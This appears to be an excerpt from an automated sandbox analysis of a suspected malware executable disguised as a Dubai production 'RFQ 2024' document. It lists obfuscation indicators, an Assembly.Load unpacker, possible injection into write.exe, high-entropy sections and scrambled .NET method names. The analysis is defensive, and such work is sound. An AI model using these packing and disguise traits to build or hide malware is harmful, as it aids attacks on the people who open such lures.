Source:	Binary string: wntdll.pdb source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000004.00000003.109069267255.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000004.00000003.109072057070.0000000004D86000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, l7CvVv73RVnMRs0rwk.cs	.Net Code: AxCq4ILaE1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, l7CvVv73RVnMRs0rwk.cs	.Net Code: AxCq4ILaE1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, l7CvVv73RVnMRs0rwk.cs	.Net Code: AxCq4ILaE1 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_07230EA8 push eax; ret	0_2_07230EAE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_07230D7C push eax; ret	0_2_07230D80
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_072C7046 push es; retf	0_2_072C705C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068D7AE0 push esp; iretd	0_2_068D7AE1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068D7B88 pushfd ; iretd	0_2_068D7B89
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0041433C push eax; retn 5C94h	2_2_00414328
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00408810 push E8C19C57h; retf	2_2_00408817
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00402221 push edi; retf	2_2_00402235
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00411A9A push 797FD1CCh; iretd	2_2_00411ABD
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_004122A3 push ebx; retf	2_2_004122A6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00406BC7 push es; ret	2_2_00406BCD
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040745F push esp; retf	2_2_00407466
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0041EC0F push eax; iretd	2_2_0041EC15
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_004034B0 push eax; ret	2_2_004034B2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040D563 push 4EF1F631h; retf	2_2_0040D573
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040D532 push esi; retf	2_2_0040D544
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00415DC3 push esi; ret	2_2_00415DCE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00413D93 push 2370h; ret	2_2_00413DC7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0041A59C push cs; ret	2_2_0041A5A2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00419E9A push esp; ret	2_2_00419E9F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016008CD push ecx; mov dword ptr [esp], ecx	2_2_016008D6
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4CBA8 push eax; iretd	3_2_02C4CBA9
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C48B03 push 797FD1CCh; iretd	3_2_02C48B26
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4930C push ebx; retf	3_2_02C4930F
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02990000 push ss; iretd	3_2_02990001
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C3F879 push E8C19C57h; retf	3_2_02C3F880
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C41E53 push edi; iretd	3_2_02C41E46
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C51605 push cs; ret	3_2_02C5160B
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C50F03 push esp; ret	3_2_02C50F08
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C3E4C8 push esp; retf	3_2_02C3E4CF
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4CCF3 push es; retf	3_2_02C4CD24

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: section name: .text entropy: 7.757882678113778

Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, kOfgkf5ENS4qoHoe4m.cs	High entropy of concatenated method names: 'TgXcGk75I5', 'dCocj4KyEM', 'c2Zc5eb3Nr', 'Ui7cldqjJq', 'ypScUw6tH8', 'oiIchsqict', 'CSDcFhg9F0', 'F9bc6cdZfY', 'f5xcReHJhU', 'ASkc8r0vII'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, DZrAGWzkTcHjuK2S7J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EkkkdVmv4j', 'TZokcrZ2rW', 'PPVkelir4I', 'CLTkMr3Y09', 'BTIkslR4Mg', 'IAxkkmWBCI', 'WKakp3V3VB'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, P6QPw1EJS6EnsDFh5s.cs	High entropy of concatenated method names: 'hIQPnvkxkD', 'QLiP05kVgE', 'VxLPLWnYYv', 'B5yPaCNw75', 'JjAP7MMNpL', 'QNOLQEwNuc', 'Q88L9DDIQd', 'kG1Lb8KGjL', 'UQfLHVwKQs', 'jBOLi8CPuD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, i78XxB0Ew9fDR0o1V5.cs	High entropy of concatenated method names: 'Dispose', 'C8N2iHt4Fw', 'HerIUrsHLZ', 'ffC11Dffww', 'gkI2BjEBlU', 'd7D2zxikfQ', 'ProcessDialogKey', 'ydiIZakkLr', 'L8jI2m2GEP', 'AwkIIy6rVN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, KhvgaD8HeSUHTdYGuO.cs	High entropy of concatenated method names: 'Bl7aTUqHiO', 'JdtaXmjEwx', 'lTwaPx2kCx', 'S1VPB72epn', 'iUTPzIQIe0', 'AALaZmaeRh', 'wIja2jjVPx', 'SN4aIVLkqX', 'PtGagd7SbR', 'xuwaqptExD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, l7CvVv73RVnMRs0rwk.cs	High entropy of concatenated method names: 'dSEgnlhg3k', 'MycgTybTcL', 'vDEg0TElfd', 'LfUgXnNk8r', 'OUIgLZ4ck9', 'luIgP41Pfe', 'E71gaEZjjV', 'CdLg7aq2QT', 'hTpgCrBYfY', 'LJigmqmFNe'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, JkGll7Ibh6dEo0P07g.cs	High entropy of concatenated method names: 'wAO4lGGVY', 'y9WyV8UWx', 'mrWtRir1r', 'IGwA23vWZ', 'bhKJtlGOZ', 'CSDfZHRfk', 'DiG3XvRi0SLrioZSDi', 'IsvA4qbBhBKhUeTMsB', 'TNpsJIu3J', 'eCDpd8ATo'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, A6rVNhBVXAKQXO2Oma.cs	High entropy of concatenated method names: 'vQok2QJHEW', 'eiwkgHkBnJ', 'yLlkqT5KmS', 'cqMkTuF8Q7', 'iPUk0oaab2', 'fbakLbusIE', 'hM2kPCeMYp', 'oEosb3mrFj', 'BJesHWfKhM', 'pu8siBLnbO'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, OrF88Rx7xnWyvOLXbn.cs	High entropy of concatenated method names: 'NP0dYfr92f', 'eLYdJA1AKd', 'GrQdEgh6uL', 'XyTdU4AnOj', 'DC3dFQkuwv', 'Q0gd63FtJ9', 'y4Ud8SV0A2', 'xIvdvm39nP', 'iPcdG3YHln', 'YNPdVerdNK'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, f29uMAYA75rQjpJamT.cs	High entropy of concatenated method names: 'v2d05DJY3V', 'pmF0lmKbS5', 'Bf30wZfeC3', 'aof0uuNZtx', 'APm0QOuB3r', 'a1g092J8Rm', 'm2f0bWhC7h', 'lDl0HZpels', 'R770iwdrnS', 'gqv0BGGVN1'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, sIjEBlHUg7DxikfQNd.cs	High entropy of concatenated method names: 'l1PsT1Jfjg', 'hLKs0JkGiA', 'S8dsXs09qo', 'uLvsLU1bL3', 'bTWsPHJR8h', 'Tq7saVMeEa', 'nwRs7wVhks', 'S22sCLUNXB', 'mmIsmi3cjQ', 'zCxsDjbVVK'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, cRI5XtfVkGoFvkxpKo.cs	High entropy of concatenated method names: 'zLALOHwRVy', 'bOgLA2CfGC', 'dwVXhcrSZd', 'dGYXFwYCgZ', 'cECX66HDBB', 'q7EXRUjW3C', 'eeQX8WaYdg', 'HHnXvyTh6i', 'BHSX31piWP', 'ggkXGIZQjD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, v7slOGXZe0WaGxgtoj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R1qIicDKKF', 'nakIBVZ9rM', 'FWEIzufiNr', 'GW0gZ82hXX', 'Kc5g2Nix1E', 'jY4gIpgygX', 'sOjgg5sHoI', 'wdQv3BdmOmHSNcOah4M'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, XakkLri88jm2GEPywk.cs	High entropy of concatenated method names: 'r3osEj53L9', 'Ki5sUm0Rrw', 'nXFshw99oi', 'nvysFZp1Ao', 'NRHs5wuusG', 'LRfs691SoQ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, x4sY1x9IRZx67koOP1.cs	High entropy of concatenated method names: 'y7mMHnLubB', 'QwXMBdQjdi', 'OacsZZB0qX', 'Vuvs2KgrPw', 'bHoMVqYbFR', 'OscMjqi3ZZ', 'poGMxKcT4F', 'TSHM5iBbPg', 'TY5MldvqZb', 'hxQMw6TaC9'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, BGwncZwrGigqoHvJ7n.cs	High entropy of concatenated method names: 'ToString', 'jfreVllbV4', 'r7ReUghjCG', 'tyXehKZ0yJ', 'OfDeFRsw8f', 'gZde6I59n3', 'aSQeRd8EO9', 'O0de83emq0', 'lreevVZyxu', 'i1Le3taumh'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, dhUaC4qtpC1H6ohXG6.cs	High entropy of concatenated method names: 'tS02a29uMA', 'C7527rQjpJ', 'MBv2mWa2qM', 'fGq2DDIRI5', 'rxp2cKoj6Q', 'jw12eJS6En', 'btI55W6ptBS2RlILrH', 'cSDXTyu6SYfrZI4PMK', 'DwC22bH8Dx', 'i2X2gNb3gN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, CfnJqvJBvWa2qMTGqD.cs	High entropy of concatenated method names: 'OgHXyVpCBM', 'LTbXtAMC6u', 'V4DXYWoUbE', 'VEnXJZssOo', 'NetXcaYTij', 'o7VXeJZUuj', 'CVbXMvS9eg', 'EqTXsO8nKW', 'ip1XkmKvsJ', 'L3hXpISwH7'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, CijKws2gU4kwa3eXEg7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnEp51bvLK', 'ShbplNry72', 'c6XpwZ05tY', 'op7puvP9hK', 'fUqpQaNMus', 'cnpp9kiwWe', 'XORpbonxS5'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, kSAxf32ZOs2miS70fmF.cs	High entropy of concatenated method names: 'P7rkWahmCy', 'UbRkNrbxNB', 'NBFk45xM32', 'aXvkyTrNPR', 'NDOkOIQhlC', 'qINktkTRy8', 'BWAkANBHWo', 'ySHkYRSbq8', 'RvbkJT9Nef', 'LlRkfkxvuy'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, ycIwil3e76EbpaLWOT.cs	High entropy of concatenated method names: 'pnUaWjoPvZ', 'ipWaNWTKQH', 'M8La4mVDkW', 'YVQaymro46', 'j8QaOny7Es', 'UsMatRfXq9', 'E1waA5Y1oc', 'LU2aYTVUED', 'uStaJaD4dF', 'vunafOqTof'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, kOfgkf5ENS4qoHoe4m.cs	High entropy of concatenated method names: 'TgXcGk75I5', 'dCocj4KyEM', 'c2Zc5eb3Nr', 'Ui7cldqjJq', 'ypScUw6tH8', 'oiIchsqict', 'CSDcFhg9F0', 'F9bc6cdZfY', 'f5xcReHJhU', 'ASkc8r0vII'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, DZrAGWzkTcHjuK2S7J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EkkkdVmv4j', 'TZokcrZ2rW', 'PPVkelir4I', 'CLTkMr3Y09', 'BTIkslR4Mg', 'IAxkkmWBCI', 'WKakp3V3VB'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, P6QPw1EJS6EnsDFh5s.cs	High entropy of concatenated method names: 'hIQPnvkxkD', 'QLiP05kVgE', 'VxLPLWnYYv', 'B5yPaCNw75', 'JjAP7MMNpL', 'QNOLQEwNuc', 'Q88L9DDIQd', 'kG1Lb8KGjL', 'UQfLHVwKQs', 'jBOLi8CPuD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, i78XxB0Ew9fDR0o1V5.cs	High entropy of concatenated method names: 'Dispose', 'C8N2iHt4Fw', 'HerIUrsHLZ', 'ffC11Dffww', 'gkI2BjEBlU', 'd7D2zxikfQ', 'ProcessDialogKey', 'ydiIZakkLr', 'L8jI2m2GEP', 'AwkIIy6rVN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, KhvgaD8HeSUHTdYGuO.cs	High entropy of concatenated method names: 'Bl7aTUqHiO', 'JdtaXmjEwx', 'lTwaPx2kCx', 'S1VPB72epn', 'iUTPzIQIe0', 'AALaZmaeRh', 'wIja2jjVPx', 'SN4aIVLkqX', 'PtGagd7SbR', 'xuwaqptExD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, l7CvVv73RVnMRs0rwk.cs	High entropy of concatenated method names: 'dSEgnlhg3k', 'MycgTybTcL', 'vDEg0TElfd', 'LfUgXnNk8r', 'OUIgLZ4ck9', 'luIgP41Pfe', 'E71gaEZjjV', 'CdLg7aq2QT', 'hTpgCrBYfY', 'LJigmqmFNe'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, JkGll7Ibh6dEo0P07g.cs	High entropy of concatenated method names: 'wAO4lGGVY', 'y9WyV8UWx', 'mrWtRir1r', 'IGwA23vWZ', 'bhKJtlGOZ', 'CSDfZHRfk', 'DiG3XvRi0SLrioZSDi', 'IsvA4qbBhBKhUeTMsB', 'TNpsJIu3J', 'eCDpd8ATo'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, A6rVNhBVXAKQXO2Oma.cs	High entropy of concatenated method names: 'vQok2QJHEW', 'eiwkgHkBnJ', 'yLlkqT5KmS', 'cqMkTuF8Q7', 'iPUk0oaab2', 'fbakLbusIE', 'hM2kPCeMYp', 'oEosb3mrFj', 'BJesHWfKhM', 'pu8siBLnbO'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, OrF88Rx7xnWyvOLXbn.cs	High entropy of concatenated method names: 'NP0dYfr92f', 'eLYdJA1AKd', 'GrQdEgh6uL', 'XyTdU4AnOj', 'DC3dFQkuwv', 'Q0gd63FtJ9', 'y4Ud8SV0A2', 'xIvdvm39nP', 'iPcdG3YHln', 'YNPdVerdNK'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, f29uMAYA75rQjpJamT.cs	High entropy of concatenated method names: 'v2d05DJY3V', 'pmF0lmKbS5', 'Bf30wZfeC3', 'aof0uuNZtx', 'APm0QOuB3r', 'a1g092J8Rm', 'm2f0bWhC7h', 'lDl0HZpels', 'R770iwdrnS', 'gqv0BGGVN1'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, sIjEBlHUg7DxikfQNd.cs	High entropy of concatenated method names: 'l1PsT1Jfjg', 'hLKs0JkGiA', 'S8dsXs09qo', 'uLvsLU1bL3', 'bTWsPHJR8h', 'Tq7saVMeEa', 'nwRs7wVhks', 'S22sCLUNXB', 'mmIsmi3cjQ', 'zCxsDjbVVK'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, cRI5XtfVkGoFvkxpKo.cs	High entropy of concatenated method names: 'zLALOHwRVy', 'bOgLA2CfGC', 'dwVXhcrSZd', 'dGYXFwYCgZ', 'cECX66HDBB', 'q7EXRUjW3C', 'eeQX8WaYdg', 'HHnXvyTh6i', 'BHSX31piWP', 'ggkXGIZQjD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, v7slOGXZe0WaGxgtoj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R1qIicDKKF', 'nakIBVZ9rM', 'FWEIzufiNr', 'GW0gZ82hXX', 'Kc5g2Nix1E', 'jY4gIpgygX', 'sOjgg5sHoI', 'wdQv3BdmOmHSNcOah4M'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, XakkLri88jm2GEPywk.cs	High entropy of concatenated method names: 'r3osEj53L9', 'Ki5sUm0Rrw', 'nXFshw99oi', 'nvysFZp1Ao', 'NRHs5wuusG', 'LRfs691SoQ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, x4sY1x9IRZx67koOP1.cs	High entropy of concatenated method names: 'y7mMHnLubB', 'QwXMBdQjdi', 'OacsZZB0qX', 'Vuvs2KgrPw', 'bHoMVqYbFR', 'OscMjqi3ZZ', 'poGMxKcT4F', 'TSHM5iBbPg', 'TY5MldvqZb', 'hxQMw6TaC9'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, BGwncZwrGigqoHvJ7n.cs	High entropy of concatenated method names: 'ToString', 'jfreVllbV4', 'r7ReUghjCG', 'tyXehKZ0yJ', 'OfDeFRsw8f', 'gZde6I59n3', 'aSQeRd8EO9', 'O0de83emq0', 'lreevVZyxu', 'i1Le3taumh'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, dhUaC4qtpC1H6ohXG6.cs	High entropy of concatenated method names: 'tS02a29uMA', 'C7527rQjpJ', 'MBv2mWa2qM', 'fGq2DDIRI5', 'rxp2cKoj6Q', 'jw12eJS6En', 'btI55W6ptBS2RlILrH', 'cSDXTyu6SYfrZI4PMK', 'DwC22bH8Dx', 'i2X2gNb3gN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, CfnJqvJBvWa2qMTGqD.cs	High entropy of concatenated method names: 'OgHXyVpCBM', 'LTbXtAMC6u', 'V4DXYWoUbE', 'VEnXJZssOo', 'NetXcaYTij', 'o7VXeJZUuj', 'CVbXMvS9eg', 'EqTXsO8nKW', 'ip1XkmKvsJ', 'L3hXpISwH7'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, CijKws2gU4kwa3eXEg7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnEp51bvLK', 'ShbplNry72', 'c6XpwZ05tY', 'op7puvP9hK', 'fUqpQaNMus', 'cnpp9kiwWe', 'XORpbonxS5'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, kSAxf32ZOs2miS70fmF.cs	High entropy of concatenated method names: 'P7rkWahmCy', 'UbRkNrbxNB', 'NBFk45xM32', 'aXvkyTrNPR', 'NDOkOIQhlC', 'qINktkTRy8', 'BWAkANBHWo', 'ySHkYRSbq8', 'RvbkJT9Nef', 'LlRkfkxvuy'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, ycIwil3e76EbpaLWOT.cs	High entropy of concatenated method names: 'pnUaWjoPvZ', 'ipWaNWTKQH', 'M8La4mVDkW', 'YVQaymro46', 'j8QaOny7Es', 'UsMatRfXq9', 'E1waA5Y1oc', 'LU2aYTVUED', 'uStaJaD4dF', 'vunafOqTof'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, kOfgkf5ENS4qoHoe4m.cs	High entropy of concatenated method names: 'TgXcGk75I5', 'dCocj4KyEM', 'c2Zc5eb3Nr', 'Ui7cldqjJq', 'ypScUw6tH8', 'oiIchsqict', 'CSDcFhg9F0', 'F9bc6cdZfY', 'f5xcReHJhU', 'ASkc8r0vII'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, DZrAGWzkTcHjuK2S7J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EkkkdVmv4j', 'TZokcrZ2rW', 'PPVkelir4I', 'CLTkMr3Y09', 'BTIkslR4Mg', 'IAxkkmWBCI', 'WKakp3V3VB'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, P6QPw1EJS6EnsDFh5s.cs	High entropy of concatenated method names: 'hIQPnvkxkD', 'QLiP05kVgE', 'VxLPLWnYYv', 'B5yPaCNw75', 'JjAP7MMNpL', 'QNOLQEwNuc', 'Q88L9DDIQd', 'kG1Lb8KGjL', 'UQfLHVwKQs', 'jBOLi8CPuD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, i78XxB0Ew9fDR0o1V5.cs	High entropy of concatenated method names: 'Dispose', 'C8N2iHt4Fw', 'HerIUrsHLZ', 'ffC11Dffww', 'gkI2BjEBlU', 'd7D2zxikfQ', 'ProcessDialogKey', 'ydiIZakkLr', 'L8jI2m2GEP', 'AwkIIy6rVN'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, KhvgaD8HeSUHTdYGuO.cs	High entropy of concatenated method names: 'Bl7aTUqHiO', 'JdtaXmjEwx', 'lTwaPx2kCx', 'S1VPB72epn', 'iUTPzIQIe0', 'AALaZmaeRh', 'wIja2jjVPx', 'SN4aIVLkqX', 'PtGagd7SbR', 'xuwaqptExD'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, l7CvVv73RVnMRs0rwk.cs	High entropy of concatenated method names: 'dSEgnlhg3k', 'MycgTybTcL', 'vDEg0TElfd', 'LfUgXnNk8r', 'OUIgLZ4ck9', 'luIgP41Pfe', 'E71gaEZjjV', 'CdLg7aq2QT', 'hTpgCrBYfY', 'LJigmqmFNe'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, JkGll7Ibh6dEo0P07g.cs	High entropy of concatenated method names: 'wAO4lGGVY', 'y9WyV8UWx', 'mrWtRir1r', 'IGwA23vWZ', 'bhKJtlGOZ', 'CSDfZHRfk', 'DiG3XvRi0SLrioZSDi', 'IsvA4qbBhBKhUeTMsB', 'TNpsJIu3J', 'eCDpd8ATo'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, A6rVNhBVXAKQXO2Oma.cs	High entropy of concatenated method names: 'vQok2QJHEW', 'eiwkgHkBnJ', 'yLlkqT5KmS', 'cqMkTuF8Q7', 'iPUk0oaab2', 'fbakLbusIE', 'hM2kPCeMYp', 'oEosb3mrFj', 'BJesHWfKhM', 'pu8siBLnbO'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, OrF88Rx7xnWyvOLXbn.cs	High entropy of concatenated method names: 'NP0dYfr92f', 'eLYdJA1AKd', 'GrQdEgh6uL', 'XyTdU4AnOj', 'DC3dFQkuwv', 'Q0gd63FtJ9', 'y4Ud8SV0A2', 'xIvdvm39nP', 'iPcdG3YHln', 'YNPdVerdNK'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, f29uMAYA75rQjpJamT.cs	High entropy of concatenated method names: 'v2d05DJY3V', 'pmF0lmKbS5', 'Bf30wZfeC3', 'aof0uuNZtx', 'APm0QOuB3r', 'a1g092J8Rm', 'm2f0bWhC7h', 'lDl0HZpels', 'R770iwdrnS', 'gqv0BGGVN1'
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, sIjEBlHUg7DxikfQNd.cs	High entropy of concatenated method names: 'l1PsT1Jfjg', 'hLKs0JkGiA', 'S8dsXs09qo', 'uLvsLU1bL3', 'bTWsPHJR8h', 'Tq7saVMeEa', 'nwRs7wVhks', 'S22sCLUNXB', 'mmIsmi3cjQ', 'zCxsDjbVVK'
